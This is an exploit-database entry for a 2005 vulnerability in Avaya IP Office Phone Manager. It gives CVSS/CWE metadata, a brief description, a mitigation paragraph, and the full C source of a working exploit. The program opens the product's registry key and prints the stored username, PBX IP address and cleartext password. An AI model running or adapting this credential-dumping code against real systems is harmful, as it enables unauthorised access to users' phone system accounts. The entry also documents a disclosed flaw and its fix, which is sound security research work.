Avaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability Exploit v0.01

vendor:

IP Office Phone Manager

by:

pagvac (Adrian Pastor)

5.5

CVSS

MEDIUM

Cleartext Sensitive Data Vulnerability

798

CWE

Product Name: IP Office Phone Manager

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows

2005

Avaya IP Office Phone Manager – Cleartext Sensitive Data Vulnerability Exploit v0.01

This exploit allows an attacker to retrieve sensitive data, such as usernames, IP addresses, and passwords, from Avaya IP Office Phone Manager. It works by querying the Windows registry for specific values and printing them to the console.

Mitigation:

The vendor should encrypt sensitive data stored in the Windows registry to prevent unauthorized access. Users should also ensure that only trusted individuals have access to the registry.

Source

Exploit-DB raw data:

#include <windows.h>
#include <stdio.h>
#include <string.h>

/*
               Filename:               exploit.c
               Title:          Avaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability Exploit v0.01
               Author:         pagvac (Adrian Pastor)
               Date:                   24th Feb, 2005
               Other info:             tested on version 2.013. Compile as a Win32 console application project in Visual C++
*/

BOOL QueryVal(char lszVal2Query[255], char lszValData[255])
{
    char lszResult[255];
    HKEY hKey;
    LONG returnStatus;
    DWORD dwType=REG_SZ;
    DWORD dwSize=255;
    returnStatus = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\AVAYA\\IP400\\GENERIC", 0L, KEY_READ, &hKey);

        if (returnStatus == ERROR_SUCCESS)
    {
                returnStatus = RegQueryValueEx(hKey, lszVal2Query, NULL, &dwType,(LPBYTE)&lszResult, &dwSize);
         if (returnStatus == ERROR_SUCCESS)
         {
                          strcpy(lszValData, lszResult);
         }
                 RegCloseKey(hKey);
                 return TRUE;
    }
        else
        {
                RegCloseKey(hKey);
                return FALSE;
    }
}

void main()
{
       char valData[255];

       printf("\nAvaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability Exploit\n");
       printf("By pagvac (Adrian Pastor)\n");
       printf("Tested on version 2.013\n\n");

       // Print username
       printf("Username:\t");
       if(!QueryVal("UserName", valData))
               printf("Error! No permissions to read key value?\n");
       else
               printf("%s\n", valData);

       // Print IP address
       printf("PBX IP Address:\t");
       if(!QueryVal("PBXAddress", valData))
               printf("Error! No permissions to read key value?\n");
       else
               printf("%s\n", valData);

       // Print password
       printf("Password:\t");
       if(!QueryVal("Password", valData))
               printf("Error! No permissions to read key value?\n");
       else
       {

               if(strcmp(valData, "")==0)
                       printf("[blank password]\n\n");
               else
               {
                       printf("%s\n", valData);
                       printf("Password obsfucated?\n\n");
               }
       }

}

// milw0rm.com [2005-02-24]